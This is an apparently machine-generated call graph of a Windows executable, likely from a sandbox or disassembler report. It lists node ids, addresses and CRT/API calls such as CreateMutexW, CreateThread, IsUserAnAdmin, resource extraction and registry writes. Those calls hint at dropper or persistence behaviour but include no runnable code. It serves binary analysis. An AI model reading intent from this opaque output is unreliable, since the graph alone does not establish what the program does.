13322->13288 13324 1708d6 13323->13324 13325 1708c6 13323->13325 13324->13292 13325->13324 13326 16ed43 _free 14 API calls 13325->13326 13326->13325 13327->13212 13364 1717db 13328->13364 13331 1718ee 13332 1718fa ___scrt_is_nonwritable_in_current_image 13331->13332 13333 16e960 __dosmaperr 14 API calls 13332->13333 13338 171927 _unexpected 13332->13338 13339 171921 _unexpected 13332->13339 13333->13339 13334 17196e 13335 16ecd3 __dosmaperr 14 API calls 13334->13335 13337 171973 13335->13337 13336 171958 13336->13128 13375 16ec16 13337->13375 13341 17199a 13338->13341 13378 170201 EnterCriticalSection 13338->13378 13339->13334 13339->13336 13339->13338 13343 171acd 13341->13343 13345 1719dc 13341->13345 13355 171a0b 13341->13355 13350 171ad8 13343->13350 13410 170251 LeaveCriticalSection 13343->13410 13345->13355 13379 16e809 GetLastError 13345->13379 13347 16bb30 _unexpected 23 API calls 13351 171ae0 13347->13351 13350->13347 13352 16e809 _unexpected 37 API calls 13356 171a60 13352->13356 13354 16e809 _unexpected 37 API calls 13354->13355 13406 171a7a 13355->13406 13356->13336 13357 16e809 _unexpected 37 API calls 13356->13357 13357->13336 13359 16ea86 _unexpected 13358->13359 13360 16eab2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13359->13360 13361 16eb83 _unexpected 13360->13361 13424 168bf5 13361->13424 13363 16eba1 13363->13126 13365 1717e7 ___scrt_is_nonwritable_in_current_image 13364->13365 13370 170201 EnterCriticalSection 13365->13370 13367 1717f5 13371 171833 13367->13371 13370->13367 13374 170251 LeaveCriticalSection 13371->13374 13373 16c300 13373->13128 13373->13331 13374->13373 13411 16ebb2 13375->13411 13377 16ec22 13377->13336 13378->13341 13380 16e820 13379->13380 13381 16e826 13379->13381 13382 17143c __dosmaperr 6 API calls 13380->13382 13383 17147b __dosmaperr 6 API calls 13381->13383 13402 16e82c SetLastError 13381->13402 13382->13381 13384 16e844 13383->13384 13385 16ece6 __dosmaperr 14 API calls 13384->13385 13384->13402 13387 16e854 13385->13387 13390 16e873 13387->13390 13391 16e85c 13387->13391 13388 16e8c0 13393 16c2fb CallUnexpected 35 API calls 13388->13393 13389 16e8ba 13389->13354 13394 17147b __dosmaperr 6 API calls 13390->13394 13392 17147b __dosmaperr 6 API calls 13391->13392 13403 16e86a 13392->13403 13395 16e8c5 13393->13395 13396 16e87f 13394->13396 13397 16e894 13396->13397 13398 16e883 13396->13398 13401 16e62e __dosmaperr 14 API calls 13397->13401 13400 17147b __dosmaperr 6 API calls 13398->13400 13399 16ed43 _free 14 API calls 13399->13402 13400->13403 13404 16e89f 13401->13404 13402->13388 13402->13389 13403->13399 13405 16ed43 _free 14 API calls 13404->13405 13405->13402 13407 171a80 13406->13407 13408 171a51 13406->13408 13423 170251 LeaveCriticalSection 13407->13423 13408->13336 13408->13352 13408->13356 13410->13350 13412 16e960 __dosmaperr 14 API calls 13411->13412 13413 16ebbd 13412->13413 13414 16ebcb 13413->13414 13419 16ec26 IsProcessorFeaturePresent 13413->13419 13414->13377 13416 16ec15 13417 16ebb2 ___std_exception_copy 25 API calls 13416->13417 13418 16ec22 13417->13418 13418->13377 13420 16ec32 13419->13420 13421 16ea6a _unexpected 8 API calls 13420->13421 13422 16ec47 GetCurrentProcess TerminateProcess 13421->13422 13422->13416 13423->13408 13425 168bfe IsProcessorFeaturePresent 13424->13425 13426 168bfd 13424->13426 13428 168c40 13425->13428 13426->13363 13431 168c03 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13428->13431 13430 168d23 13430->13363 13431->13430 13433 16fbd9 ___scrt_is_nonwritable_in_current_image 13432->13433 13434 16fbf3 13433->13434 13476 170201 EnterCriticalSection 13433->13476 13436 16facc 13434->13436 13439 16c2fb CallUnexpected 37 API calls 13434->13439 13443 16f863 13436->13443 13437 16fc2f 13477 16fc4c 13437->13477 13440 16fc6c 13439->13440 13441 16fc03 13441->13437 13442 16ed43 _free 14 API calls 13441->13442 13442->13437 13481 16ca4a 13443->13481 13446 16f896 13448 16f89b GetACP 13446->13448 13449 16f8ad 13446->13449 13447 16f884 GetOEMCP 13447->13449 13448->13449 13449->13080 13450 1709e3 13449->13450 13451 170a21 13450->13451 13456 1709f1 __dosmaperr 13450->13456 13452 16ecd3 __dosmaperr 14 API calls 13451->13452 13454 16faf6 13452->13454 13453 170a0c RtlAllocateHeap 13453->13454 13453->13456 13454->13093 13457 16fccb 13454->13457 13455 171752 __dosmaperr 2 API calls 13455->13456 13456->13451 13456->13453 13456->13455 13458 16f863 39 API calls 13457->13458 13459 16fceb 13458->13459 13461 16fd25 IsValidCodePage 13459->13461 13465 16fd61 _unexpected 13459->13465 13460 168bf5 _ValidateLocalCookies 5 API calls 13462 16fb1b 13460->13462 13463 16fd37 13461->13463 13461->13465 13462->13086 13462->13090 13464 16fd66 GetCPInfo 13463->13464 13467 16fd40 _unexpected 13463->13467 13464->13465 13464->13467 13465->13460 13524 16f939 13467->13524 13469 16f761 ___scrt_is_nonwritable_in_current_image 13468->13469 13608 170201 EnterCriticalSection 13469->13608 13471 16f76b 13609 16f7a2 13471->13609 13476->13441 13480 170251 LeaveCriticalSection 13477->13480 13479 16fc53 13479->13434 13480->13479 13482 16ca6a 13481->13482 13488 16ca61 13481->13488 13483 16e809 _unexpected 37 API calls 13482->13483 13482->13488 13484 16ca8a 13483->13484 13489 1725b3 13484->13489 13488->13446 13488->13447 13490 1725c6 13489->13490 13491 16caa0 13489->13491 13490->13491 13497 1710f6 13490->13497 13493 1725e0 13491->13493 13494 1725f3 13493->13494 13495 172608 13493->13495 13494->13495 13519 16fcb8 13494->13519 13495->13488 13498 171102 ___scrt_is_nonwritable_in_current_image 13497->13498 13499 16e809 _unexpected 37 API calls 13498->13499 13500 17110b 13499->13500 13507 171151 13500->13507 13510 170201 EnterCriticalSection 13500->13510 13502 171129 13511 171177 13502->13511 13507->13491 13508 16c2fb CallUnexpected 37 API calls 13509 171176 13508->13509 13510->13502 13512 17113a 13511->13512 13513 171185 __fassign 13511->13513 13515 171156 13512->13515 13513->13512 13514 170ea9 __fassign 14 API calls 13513->13514 13514->13512 13518 170251 LeaveCriticalSection 13515->13518 13517 17114d 13517->13507 13517->13508 13518->13517 13520 16e809 _unexpected 37 API calls 13519->13520 13521 16fcc2 13520->13521 13522 16fbcd __fassign 37 API calls 13521->13522 13523 16fcc8 13522->13523 13523->13495 13525 16f961 GetCPInfo 13524->13525 13526 16fa2a 13524->13526 13525->13526 13531 16f979 13525->13531 13527 168bf5 _ValidateLocalCookies 5 API calls 13526->13527 13528 16fab7 13527->13528 13528->13465 13535 170d09 13531->13535 13534 173b0e 41 API calls 13534->13526 13536 16ca4a __fassign 37 API calls 13535->13536 13537 170d29 13536->13537 13555 16ffc9 13537->13555 13539 170de7 13541 168bf5 _ValidateLocalCookies 5 API calls 13539->13541 13540 170d56 13540->13539 13543 1709e3 15 API calls 13540->13543 13546 170d7c _unexpected 13540->13546 13544 16f9e1 13541->13544 13542 170de1 13558 170e0c 13542->13558 13543->13546 13550 173b0e 13544->13550 13546->13542 13547 16ffc9 __fassign MultiByteToWideChar 13546->13547 13548 170dca 13547->13548 13548->13542 13549 170dd1 GetStringTypeW 13548->13549 13549->13542 13551 16ca4a __fassign 37 API calls 13550->13551 13552 173b21 13551->13552 13562 173924 13552->13562 13556 16ffda MultiByteToWideChar 13555->13556 13556->13540 13559 170e18 13558->13559 13561 170e29 13558->13561 13560 16ed43 _free 14 API calls 13559->13560 13559->13561 13560->13561 13561->13539 13563 17393f 13562->13563 13564 16ffc9 __fassign MultiByteToWideChar 13563->13564 13568 173983 13564->13568 13565 173ae8 13566 168bf5 _ValidateLocalCookies 5 API calls 13565->13566 13567 16fa02 13566->13567 13567->13534 13568->13565 13569 1709e3 15 API calls 13568->13569 13571 1739a8 13568->13571 13569->13571 13570 16ffc9 __fassign MultiByteToWideChar 13572 1739ee 13570->13572 13571->13570 13589 173a4d 13571->13589 13572->13589 13590 171508 13572->13590 13573 170e0c __freea 14 API calls 13573->13565 13576 173a24 13580 171508 6 API calls 13576->13580 13576->13589 13577 173a5c 13578 173a6e 13577->13578 13581 1709e3 15 API calls 13577->13581 13579 173ad9 13578->13579 13582 171508 6 API calls 13578->13582 13583 170e0c __freea 14 API calls 13579->13583 13580->13589 13581->13578 13584 173ab6 13582->13584 13583->13589 13584->13579 13596 170045 13584->13596 13586 173ad0 13586->13579 13587 173b05 13586->13587 13588 170e0c __freea 14 API calls 13587->13588 13588->13589 13589->13573 13599 1711e1 13590->13599 13594 171559 LCMapStringW 13595 171519 13594->13595 13595->13576 13595->13577 13595->13589 13598 17005c WideCharToMultiByte 13596->13598 13598->13586 13600 1712dc __dosmaperr 5 API calls 13599->13600 13601 1711f7 13600->13601 13601->13595 13602 171565 13601->13602 13605 1711fb 13602->13605 13604 171570 13604->13594 13606 1712dc __dosmaperr 5 API calls 13605->13606 13607 171211 13606->13607 13607->13604 13608->13471 13619 16febe 13609->13619 13611 16f7c4 13612 16febe 25 API calls 13611->13612 13613 16f7e3 13612->13613 13614 16f778 13613->13614 13615 16ed43 _free 14 API calls 13613->13615 13616 16f796 13614->13616 13615->13614 13633 170251 LeaveCriticalSection 13616->13633 13618 16f784 13618->13093 13620 16fecf 13619->13620 13628 16fecb __cftoe 13619->13628 13621 16fed6 13620->13621 13624 16fee9 _unexpected 13620->13624 13622 16ecd3 __dosmaperr 14 API calls 13621->13622 13623 16fedb 13622->13623 13625 16ec16 ___std_exception_copy 25 API calls 13623->13625 13626 16ff17 13624->13626 13627 16ff20 13624->13627 13624->13628 13625->13628 13629 16ecd3 __dosmaperr 14 API calls 13626->13629 13627->13628 13630 16ecd3 __dosmaperr 14 API calls 13627->13630 13628->13611 13631 16ff1c 13629->13631 13630->13631 13632 16ec16 ___std_exception_copy 25 API calls 13631->13632 13632->13628 13633->13618 13635 16ca4a __fassign 37 API calls 13634->13635 13636 16ff53 13635->13636 13636->12873 13638 16132b 40 API calls 13637->13638 13639 163636 13638->13639 13640 163afc 26 API calls 13639->13640 13641 16363e 13640->13641 13642 163659 13641->13642 13644 16364c 13641->13644 13902 1638b5 13642->13902 13910 163477 13644->13910 13645 163159 13647 16132b 13645->13647 13648 161359 13647->13648 13649 161342 13647->13649 14024 179616 EnterCriticalSection 13648->14024 13652 179616 6 API calls 13649->13652 13661 161354 13649->13661 13651 161363 13651->13649 13653 16136d GetProcessHeap 13651->13653 13654 1613b7 13652->13654 14029 168636 13653->14029 13657 168636 28 API calls 13654->13657 13654->13661 13658 161404 13657->13658 13660 1795cc __Init_thread_footer 5 API calls 13658->13660 13660->13661 13662 163afc 13661->13662 13663 163b2a 13662->13663 13664 16316a 13662->13664 13665 1610bf 26 API calls 13663->13665 13667 161684 13664->13667 13666 163b34 13665->13666 13668 16132b 40 API calls 13667->13668 13669 1616a1 13668->13669 13670 163afc 26 API calls 13669->13670 13671 1616aa 13670->13671 13672 1636e0 28 API calls 13671->13672 13673 1616ba 13672->13673 14105 161052 13673->14105 13675 1616cb 14109 163a6c 13675->14109 13677 1616e3 13678 161302 RtlFreeHeap 13677->13678 13679 1616ee 13678->13679 13680 168bf5 _ValidateLocalCookies 5 API calls 13679->13680 13681 1616fa 13680->13681 13682 1617f7 13681->13682 13683 161870 13682->13683 13684 161808 13682->13684 13690 161302 13683->13690 13684->13683 13685 16183b 13684->13685 14341 16371b 13684->14341 13685->13683 13687 16185b 13685->13687 13688 16371b 26 API calls 13685->13688 14346 16353c 13687->14346 13688->13687 13691 161328 13690->13691 13692 16130f 13690->13692 13691->12890 13691->12891 14354 1614a0 13692->14354 13695 163087 13694->13695 13696 1630f4 GetLastError 13694->13696 13695->13696 13698 16308b 13695->13698 13697 1630fa 13696->13697 13699 168bf5 _ValidateLocalCookies 5 API calls 13697->13699 14361 163668 13698->14361 13701 163107 13699->13701 13701->12895 13702 1630a3 13703 161684 59 API calls 13702->13703 13704 1630b6 13703->13704 14368 164863 13704->14368 13707 161302 RtlFreeHeap 13708 1630f0 13707->13708 13708->13697 13710 16132b 40 API calls 13709->13710 13711 1618af 13710->13711 13712 163afc 26 API calls 13711->13712 13713 1618b8 13712->13713 13714 161684 59 API calls 13713->13714 13719 1618cb LocalFree 13714->13719 13716 161302 RtlFreeHeap 13717 161927 13716->13717 13718 168bf5 _ValidateLocalCookies 5 API calls 13717->13718 13720 161936 13718->13720 13719->13716 13720->12896 13720->12897 14397 1652e1 RegOpenKeyExW 13721->14397 13724 1652e1 8 API calls 13725 1641e8 13724->13725 13725->12915 13727 164241 13726->13727 13728 16428f CreateMutexW 13726->13728 13731 16132b 40 API calls 13727->13731 13729 1642b7 13728->13729 13730 1642a0 CreateThread 13728->13730 13732 168bf5 _ValidateLocalCookies 5 API calls 13729->13732 13730->13729 14585 164340 13730->14585 13733 164246 13731->13733 13735 163270 CoInitializeEx 13732->13735 13734 163afc 26 API calls 13733->13734 13736 164250 13734->13736 13735->12921 13735->12922 14402 1663ec 13736->14402 13741 169110 _unexpected 13740->13741 13742 16161a VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 13741->13742 13743 168bf5 _ValidateLocalCookies 5 API calls 13742->13743 13744 161682 13743->13744 13744->12921 13744->12927 13746 163668 52 API calls 13745->13746 13747 1619ec 13746->13747 13748 16132b 40 API calls 13747->13748 13749 1619f1 13748->13749 13750 163afc 26 API calls 13749->13750 13751 1619fa 13750->13751 13752 16132b 40 API calls 13751->13752 13753 161a0b 13752->13753 13754 163afc 26 API calls 13753->13754 13755 161a14 13754->13755 13756 16132b 40 API calls 13755->13756 13757 161a19 13756->13757 13758 163afc 26 API calls 13757->13758 13759 161a22 13758->13759 13760 161a73 13759->13760 13761 16187b 62 API calls 13760->13761 13762 161a97 13761->13762 13763 161abd 13762->13763 14630 161f55 SHGetKnownFolderPath 13762->14630 13770 161bc3 13763->13770 14594 1625d9 IsUserAnAdmin 13763->14594 13768 161ad0 14648 1626c9 13768->14648 13769 161adf FindResourceW 13772 161b04 13769->13772 13773 161afb 13769->13773 13776 168bf5 _ValidateLocalCookies 5 API calls 13770->13776 13780 161b47 13772->13780 13787 161b24 13772->13787 14621 1627a1 FindResourceW 13772->14621 14668 165272 13773->14668 13779 161d42 13776->13779 13779->12935 13779->12937 13783 163b35 26 API calls 13780->13783 13781 1641bd 8 API calls 13781->13763 13788 161b52 13783->13788 14673 162829 13787->14673 13790 161b97 13788->13790 14681 16497a 13788->14681 13790->13770 13791 161bd6 13790->13791 13792 161be1 13790->13792 14695 1628da 13791->14695 13792->13770 13794 161bdd 13792->13794 13794->13770 13794->13792 13795 163b35 26 API calls 13794->13795 13796 161bfc 13795->13796 13797 1636e0 28 API calls 13796->13797 13798 161c12 _unexpected 13797->13798 13799 161c35 GetModuleFileNameW 13798->13799 13800 161c58 13799->13800 13801 161c4b 13799->13801 13802 161c67 13800->13802 13803 161cad 13800->13803 13801->13800 14722 161786 13801->14722 13805 161c8a 13802->13805 13806 161c6b 13802->13806 13807 161684 59 API calls 13803->13807 13809 161684 59 API calls 13805->13809 13808 162dd7 59 API calls 13806->13808 13810 161cbd 13807->13810 13811 161c77 13808->13811 13812 161ca8 13809->13812 14734 161d96 13810->14734 13814 161302 RtlFreeHeap 13811->13814 14753 161e78 13812->14753 13816 161c83 13814->13816 13816->13770 13828 162f36 13827->13828 13829 162ed7 RegQueryValueExA 13827->13829 13830 168bf5 _ValidateLocalCookies 5 API calls 13828->13830 13831 162eff RegSetValueExA RegCloseKey 13829->13831 13832 162f41 13830->13832 13831->13828 13834 162f46 13832->13834 13835 169110 _unexpected 13834->13835 13836 162f6f GetModuleFileNameW 13835->13836 13837 162f8e 13836->13837 13841 16303c 13836->13841 13837->13841 15160 164c4f 13837->15160 13838 168bf5 _ValidateLocalCookies 5 API calls 13839 163053 13838->13839 13839->12896 13841->13838 13844 162fd5 13845 163034 13844->13845 13846 162fe6 RegCreateKeyExA 13844->13846 13847 161302 RtlFreeHeap 13845->13847 13846->13845 13848 163008 RegSetValueExW RegCloseKey 13846->13848 13847->13841 13848->13845 13850 16132b 40 API calls 13849->13850 13851 162df6 13850->13851 13852 163afc 26 API calls 13851->13852 13853 162dff 13852->13853 13854 162e16 13853->13854 13855 162e07 13853->13855 15214 162db4 13854->15214 13856 163477 37 API calls 13855->13856 13858 162e14 13856->13858 13862 16132b 40 API calls 13858->13862 13864 162e44 13862->13864 13863 161302 RtlFreeHeap 13863->13858 13865 163afc 26 API calls 13864->13865 13866 162e4d 13865->13866 13867 162db4 52 API calls 13866->13867 13868 162e55 13867->13868 13869 163e04 58 API calls 13868->13869 13870 162e65 13869->13870 13871 161302 RtlFreeHeap 13870->13871 13872 162e73 MessageBoxW 13871->13872 13873 161302 RtlFreeHeap 13872->13873 13874 162e8c 13873->13874 13875 161302 RtlFreeHeap 13874->13875 13876 162e94 13875->13876 13877 168bf5 _ValidateLocalCookies 5 API calls 13876->13877 13878 162ea3 13877->13878 13891 163463 13878->13891 13880 161a3e 13879->13880 13881 161a39 13879->13881 13883 161302 RtlFreeHeap 13880->13883 15263 161d46 13881->15263 13884 161a49 13883->13884 13885 161302 RtlFreeHeap 13884->13885 13886 161a54 13885->13886 15272 1633a1 13886->15272 13889 161302 RtlFreeHeap 13890 161a67 13889->13890 13892 163325 13891->13892 13893 16346b 13891->13893 13895 1642e8 13892->13895 13893->13892 13894 163470 CoUninitialize 13893->13894 13894->13892 13896 1642f1 ReleaseMutex 13895->13896 13897 164328 13895->13897 13898 164300 WaitForSingleObject CloseHandle 13896->13898 13899 16431b CloseHandle 13896->13899 13900 16432e CloseHandle 13897->13900 13901 16433b 13897->13901 13898->13899 13899->13897 13900->13901 13901->12895 13903 1638c4 MultiByteToWideChar 13902->13903 13904 1638ff 13902->13904 13903->13904 13905 1638db 13903->13905 13926 163746 13904->13926 13919 1636e0 13905->13919 13909 1638fd 13909->13645 13982 178f77 EnterCriticalSection 13910->13982 13912 1634e9 13912->13645 13913 1634a2 FindResourceExW 13916 16348c 13913->13916 13915 178f77 5 API calls 13915->13916 13916->13912 13916->13913 13916->13915 13917 1634da 13916->13917 13987 161195 LoadResource 13916->13987 13917->13912 13991 163787 FindResourceW 13917->13991 13920 163710 13919->13920 13922 1636ed 13919->13922 13937 1610bf 13920->13937 13923 163709 MultiByteToWideChar 13922->13923 13930 163ba2 13922->13930 13923->13909 13924 16371a 13927 16376d 13926->13927 13928 163758 13926->13928 13927->13909 13929 161302 RtlFreeHeap 13928->13929 13929->13927 13931 163bb3 13930->13931 13932 163bbc 13931->13932 13935 163bc6 13931->13935 13950 163bfd 13932->13950 13934 163bc4 13934->13923 13935->13934 13962 163cff 13935->13962 13981 1610aa RaiseException 13937->13981 13939 1610fe 13939->13924 13940 1610df 13940->13939 13941 1610bf 26 API calls 13940->13941 13942 16111a 13941->13942 13943 16112d 13942->13943 13944 161145 13942->13944 13946 16113c __cftoe 13942->13946 13945 16ecd3 __dosmaperr 14 API calls 13943->13945 13944->13946 13948 16ecd3 __dosmaperr 14 API calls 13944->13948 13947 161132 13945->13947 13946->13924 13949 16ec16 ___std_exception_copy 25 API calls 13947->13949 13948->13947 13949->13946 13951 163c28 13950->13951 13967 161420 13951->13967 13953 163c82 13977 163d4d 13953->13977 13954 163c4b 13971 163c88 13954->13971 13958 163c66 13959 161302 RtlFreeHeap 13958->13959 13960 163c76 13959->13960 13960->13934 13963 163d19 13962->13963 13964 163d4d 26 API calls 13963->13964 13966 163d3c 13963->13966 13965 163d4c 13964->13965 13966->13934 13968 161474 13967->13968 13969 16142f 13967->13969 13968->13953 13968->13954 13969->13968 13980 161220 RtlAllocateHeap 13969->13980 13972 163c9a 13971->13972 13974 163cbd __cftoe 13971->13974 13973 16ecd3 __dosmaperr 14 API calls 13972->13973 13975 163ca3 _unexpected 13972->13975 13973->13975 13974->13958 13975->13974 13976 16ecd3 14 API calls __dosmaperr 13975->13976 13976->13975 13978 1610bf 26 API calls 13977->13978 13979 163d57 13978->13979 13980->13968 13981->13940 13983 178f90 13982->13983 13984 178f99 LeaveCriticalSection 13982->13984 13983->13984 13999 178f4f 13983->13999 13984->13916 13988 1611ab LockResource 13987->13988 13990 1611cb 13987->13990 13989 1611b8 SizeofResource 13988->13989 13988->13990 13989->13990 13990->13916 13992 1637d7 13991->13992 13993 1637a8 13991->13993 13992->13912 13994 161195 3 API calls 13993->13994 13995 1637b5 13994->13995 13995->13992 13996 1636e0 28 API calls 13995->13996 13997 1637c8 13996->13997 14010 17b167 13997->14010 14000 178f59 13999->14000 14001 178f5e 14000->14001 14009 1610aa RaiseException 14000->14009 14001->13984 14003 178f76 EnterCriticalSection 14006 178f90 14003->14006 14007 178f99 LeaveCriticalSection 14003->14007 14006->14007 14008 178f4f RaiseException 14006->14008 14007->13984 14008->14007 14009->14003 14011 17b178 14010->14011 14015 17b174 __cftoe 14010->14015 14012 17b17f 14011->14012 14017 17b192 _wmemset 14011->14017 14013 16ecd3 __dosmaperr 14 API calls 14012->14013 14014 17b184 14013->14014 14016 16ec16 ___std_exception_copy 25 API calls 14014->14016 14015->13992 14016->14015 14017->14015 14018 17b1c3 14017->14018 14019 17b1cc 14017->14019 14020 16ecd3 __dosmaperr 14 API calls 14018->14020 14019->14015 14022 16ecd3 __dosmaperr 14 API calls 14019->14022 14021 17b1c8 14020->14021 14023 16ec16 ___std_exception_copy 25 API calls 14021->14023 14022->14021 14023->14015 14025 17962a 14024->14025 14026 17962f LeaveCriticalSection 14025->14026 14037 17969e 14025->14037 14026->13651 14042 168609 14029->14042 14032 1795cc EnterCriticalSection LeaveCriticalSection 14033 179668 14032->14033 14034 179684 SetEvent ResetEvent 14033->14034 14035 179673 RtlWakeAllConditionVariable 14033->14035 14034->13649 14035->13649 14038 1796c5 LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 14037->14038 14039 1796ac SleepConditionVariableCS 14037->14039 14040 1796e9 14038->14040 14039->14040 14040->14025 14043 16861f 14042->14043 14044 168618 14042->14044 14051 16c04a 14043->14051 14048 16bfde 14044->14048 14047 16139d 14047->14032 14049 16c04a 28 API calls 14048->14049 14050 16bff0 14049->14050 14050->14047 14054 16bd80 14051->14054 14055 16bd8c ___scrt_is_nonwritable_in_current_image 14054->14055 14062 170201 EnterCriticalSection 14055->14062 14057 16bd9a 14063 16bddb 14057->14063 14059 16bda7 14073 16bdcf 14059->14073 14062->14057 14064 16bdf7 14063->14064 14068 16be6e __dosmaperr 14063->14068 14065 16be4e 14064->14065 14064->14068 14076 171611 14064->14076 14066 171611 28 API calls 14065->14066 14065->14068 14069 16be64 14066->14069 14068->14059 14071 16ed43 _free 14 API calls 14069->14071 14070 16be44 14072 16ed43 _free 14 API calls 14070->14072 14071->14068 14072->14065 14104 170251 LeaveCriticalSection 14073->14104 14075 16bdb8 14075->14047 14077 17161e 14076->14077 14078 171639 14076->14078 14077->14078 14080 17162a 14077->14080 14079 171648 14078->14079 14085 173c3a 14078->14085 14092 173c6d 14079->14092 14081 16ecd3 __dosmaperr 14 API calls 14080->14081 14084 17162f _unexpected 14081->14084 14084->14070 14086 173c45 14085->14086 14087 173c5a HeapSize 14085->14087 14088 16ecd3 __dosmaperr 14 API calls 14086->14088 14087->14079 14089 173c4a 14088->14089 14090 16ec16 ___std_exception_copy 25 API calls 14089->14090 14091 173c55 14090->14091 14091->14079 14093 173c85 14092->14093 14094 173c7a 14092->14094 14096 173c8d 14093->14096 14102 173c96 __dosmaperr 14093->14102 14095 1709e3 15 API calls 14094->14095 14100 173c82 14095->14100 14097 16ed43 _free 14 API calls 14096->14097 14097->14100 14098 173cc0 HeapReAlloc 14098->14100 14098->14102 14099 173c9b 14101 16ecd3 __dosmaperr 14 API calls 14099->14101 14100->14084 14101->14100 14102->14098 14102->14099 14103 171752 __dosmaperr 2 API calls 14102->14103 14103->14102 14104->14075 14106 16105d 14105->14106 14108 161078 14105->14108 14106->14108 14119 161026 14106->14119 14108->13675 14110 163af1 14109->14110 14114 163a92 14109->14114 14111 1610bf 26 API calls 14110->14111 14112 163afb 14111->14112 14113 163ab6 14115 1636e0 28 API calls 14113->14115 14114->14110 14114->14113 14116 163ac7 14115->14116 14117 163c88 14 API calls 14116->14117 14118 163add 14117->14118 14118->13677 14120 161038 14119->14120 14123 16dabd 14120->14123 14126 16c4d1 14123->14126 14127 16c511 14126->14127 14128 16c4f9 14126->14128 14127->14128 14130 16c519 14127->14130 14129 16ecd3 __dosmaperr 14 API calls 14128->14129 14131 16c4fe 14129->14131 14132 16ca4a __fassign 37 API calls 14130->14132 14133 16ec16 ___std_exception_copy 25 API calls 14131->14133 14134 16c529 14132->14134 14139 16c509 14133->14139 14141 16ce13 14134->14141 14135 168bf5 _ValidateLocalCookies 5 API calls 14136 161046 14135->14136 14136->14108 14139->14135 14157 16d93d 14141->14157 14143 16c5b0 14154 16cadd 14143->14154 14144 16ce33 14145 16ecd3 __dosmaperr 14 API calls 14144->14145 14146 16ce38 14145->14146 14147 16ec16 ___std_exception_copy 25 API calls 14146->14147 14147->14143 14148 16ce24 14148->14143 14148->14144 14164 16cf6c 14148->14164 14171 16d3a2 14148->14171 14176 16cfa6 14148->14176 14181 16cfcd 14148->14181 14212 16d145 14148->14212 14155 16ed43 _free 14 API calls 14154->14155 14156 16caed 14155->14156 14156->14139 14158 16d955 14157->14158 14159 16d942 14157->14159 14158->14148 14160 16ecd3 __dosmaperr 14 API calls 14159->14160 14161 16d947 14160->14161 14162 16ec16 ___std_exception_copy 25 API calls 14161->14162 14163 16d952 14162->14163 14163->14148 14165 16cf71 14164->14165 14166 16cf88 14165->14166 14167 16ecd3 __dosmaperr 14 API calls 14165->14167 14166->14148 14168 16cf7a 14167->14168 14169 16ec16 ___std_exception_copy 25 API calls 14168->14169 14170 16cf85 14169->14170 14170->14148 14172 16d3b3 14171->14172 14173 16d3ac 14171->14173 14172->14148 14236 16cc75 14173->14236 14177 16cfb7 14176->14177 14178 16cfb0 14176->14178 14177->14148 14179 16cc75 38 API calls 14178->14179 14180 16cfb6 14179->14180 14180->14148 14182 16cff4 14181->14182 14183 16cfd9 14181->14183 14186 16ecd3 __dosmaperr 14 API calls 14182->14186 14187 16d026 14182->14187 14184 16d1d7 14183->14184 14185 16d16c 14183->14185 14183->14187 14189 16d1de 14184->14189 14190 16d21d 14184->14190 14196 16d1ae 14184->14196 14185->14196 14198 16d178 14185->14198 14188 16d011 14186->14188 14187->14148 14191 16ec16 ___std_exception_copy 25 API calls 14188->14191 14192 16d1e3 14189->14192 14202 16d185 14189->14202 14277 16d86b 14190->14277 14194 16d01c 14191->14194 14192->14196 14197 16d1e8 14192->14197 14194->14148 14195 16d1be 14211 16d1a7 14195->14211 14248 16d5ed 14195->14248 14209 16d193 14196->14209 14196->14211 14262 16d683 14196->14262 14201 16d1fb 14197->14201 14204 16d1ed 14197->14204 14198->14195 14198->14202 14198->14209 14256 16d7d8 14201->14256 14202->14209 14202->14211 14271 16d486 14202->14271 14204->14211 14252 16d84c 14204->14252 14205 168bf5 _ValidateLocalCookies 5 API calls 14208 16d3a0 14205->14208 14208->14148 14209->14211 14280 16d9bf 14209->14280 14211->14205 14213 16d1d7 14212->14213 14214 16d16c 14212->14214 14215 16d1de 14213->14215 14216 16d21d 14213->14216 14221 16d1ae 14213->14221 14214->14221 14222 16d178 14214->14222 14217 16d185 14215->14217 14218 16d1e3 14215->14218 14219 16d86b 26 API calls 14216->14219 14224 16d486 40 API calls 14217->14224 14234 16d193 14217->14234 14235 16d1a7 14217->14235 14218->14221 14225 16d1e8 14218->14225 14219->14234 14220 16d1be 14230 16d5ed 38 API calls 14220->14230 14220->14235 14223 16d683 26 API calls 14221->14223 14221->14234 14221->14235 14222->14217 14222->14220 14222->14234 14223->14234 14224->14234 14226 16d1ed 14225->14226 14227 16d1fb 14225->14227 14231 16d84c 26 API calls 14226->14231 14226->14235 14229 16d7d8 25 API calls 14227->14229 14228 168bf5 _ValidateLocalCookies 5 API calls 14232 16d3a0 14228->14232 14229->14234 14230->14234 14231->14234 14232->14148 14233 16d9bf 38 API calls 14233->14235 14234->14233 14234->14235 14235->14228 14237 16cc87 14236->14237 14238 16cc8c 14236->14238 14239 16ecd3 __dosmaperr 14 API calls 14237->14239 14244 17242d 14238->14244 14239->14238 14242 16ecd3 __dosmaperr 14 API calls 14243 16ccc0 14242->14243 14243->14148 14245 172448 14244->14245 14246 16dd59 38 API calls 14245->14246 14247 16ccac 14246->14247 14247->14242 14247->14243 14249 16d61c 14248->14249 14251 16d648 14249->14251 14284 172457 14249->14284 14251->14209 14253 16d858 14252->14253 14254 16d683 26 API calls 14253->14254 14255 16d86a 14254->14255 14255->14209 14260 16d7ed 14256->14260 14257 16ecd3 __dosmaperr 14 API calls 14258 16d7f6 14257->14258 14259 16ec16 ___std_exception_copy 25 API calls 14258->14259 14261 16d801 14259->14261 14260->14257 14260->14261 14261->14209 14263 16d696 14262->14263 14264 16d6b1 14263->14264 14266 16d6c8 14263->14266 14265 16ecd3 __dosmaperr 14 API calls 14264->14265 14267 16d6b6 14265->14267 14270 16d6c1 14266->14270 14300 16c780 14266->14300 14268 16ec16 ___std_exception_copy 25 API calls 14267->14268 14268->14270 14270->14209 14272 16d4a6 14271->14272 14310 16c703 14272->14310 14274 16d4e7 14320 172fc0 14274->14320 14276 16d55e 14276->14209 14276->14276 14278 16d683 26 API calls 14277->14278 14279 16d882 14278->14279 14279->14209 14282 16da23 14280->14282 14283 16d9d2 14280->14283 14281 172457 __fassign 38 API calls 14281->14283 14282->14211 14283->14281 14283->14282 14285 17246c 14284->14285 14299 17247c 14284->14299 14286 16ca4a __fassign 37 API calls 14285->14286 14285->14299 14287 17249d 